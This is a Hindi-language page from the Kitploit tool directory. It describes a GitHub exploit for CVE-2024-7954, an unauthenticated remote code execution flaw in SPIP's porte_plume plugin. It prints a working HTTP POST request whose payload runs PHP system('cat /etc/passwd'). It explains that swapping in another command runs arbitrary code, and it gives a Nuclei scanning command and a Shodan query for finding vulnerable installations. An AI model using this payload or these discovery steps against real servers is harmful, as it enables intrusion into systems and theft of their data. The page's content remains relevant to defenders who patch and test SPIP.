Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
RCE-CVE-2024-7954 — CVE-2024-7954 के लिए एक्सप्लॉइट, SPIP के porte_plume प्लगइन में एक गंभीर RCE, एक तैयार किया गया HTTP अनुरोध और स्वचालित स्कैनिंग के लिए Nuclei टेम्पलेट के साथ। | Kitploit
उपकरण/GitHubGitHub/arthikw3b/rce-cve-2024-7954
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

CVE-2024-7954 के लिए एक्सप्लॉइट, SPIP के porte_plume प्लगइन में एक गंभीर RCE, एक तैयार किया गया HTTP अनुरोध और स्वचालित स्कैनिंग के लिए Nuclei टेम्पलेट के साथ।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

RCE-CVE-2024-7954

विवरण

porte_plume प्लगइन, जो SPIP संस्करणों 4.30-alpha2, 4.2.13, और 4.1.16 से पहले के संस्करणों द्वारा उपयोग किया जाता है, एक गंभीर मनमाना कोड निष्पादन (RCE) भेद्यता के प्रति संवेदनशील है। यह दोष एक दूरस्थ, अप्रमाणित हमलावर को एक विशिष्ट HTTP अनुरोध तैयार करके SPIP उपयोगकर्ता के रूप में मनमाना PHP कोड निष्पादित करने की अनुमति देता है। शोषण की संभावना गंभीर है, जिससे हमलावर सर्वर पर दुर्भावनापूर्ण कमांड चला सकते हैं, जिससे अनधिकृत पहुंच, डेटा उल्लंघन, या आगे सिस्टम से समझौता हो सकता है।

भेद्यता विवरण

  • प्रभावित सॉफ़्टवेयर: SPIP (संस्करणों 4.30-alpha2, 4.2.13, और 4.1.16 से पहले)
  • भेद्यता का प्रकार: दूरस्थ कोड निष्पादन (RCE)
  • गंभीरता स्तर: गंभीर
  • शोषण क्षमता: दूरस्थ और अप्रमाणित हमलावर इस भेद्यता का शोषण कर सकते हैं।

शोषण

##Nuclei Scan

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





इस भेद्यता का शोषण करने के लिए उपयोग किए जा सकने वाले एक निर्मित HTTP अनुरोध का उदाहरण निम्नलिखित है:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

शोषण की व्याख्या:

  • POST अनुरोध SPIP के index.php फ़ाइल के porte_plume_previsu क्रिया पर निर्देशित होता है।
  • data पैरामीटर में एक पेलोड होता है जो PHP के system() फ़ंक्शन का उपयोग करके एक कमांड निष्पादित करता है (इस मामले में, cat /etc/passwd), जो पासवर्ड फ़ाइल की सामग्री पढ़ता है।
  • system() फ़ंक्शन के भीतर कमांड को बदलकर, एक हमलावर सर्वर पर कोई भी PHP कोड निष्पादित कर सकता है, जिसके गंभीर परिणाम हो सकते हैं।

Shodan Dork

संभावित रूप से कमजोर SPIP स्थापनाओं की पहचान करने के लिए, निम्नलिखित Shodan खोज क्वेरी का उपयोग किया जा सकता है:

root@kitploit:~
app="SPIP"

यह भेद्यता सॉफ़्टवेयर को अद्यतित रखने और शोषण से बचाव के लिए मजबूत सुरक्षा उपायों को लागू करने के महत्व को रेखांकित करती है।

टूल डाउनलोड करें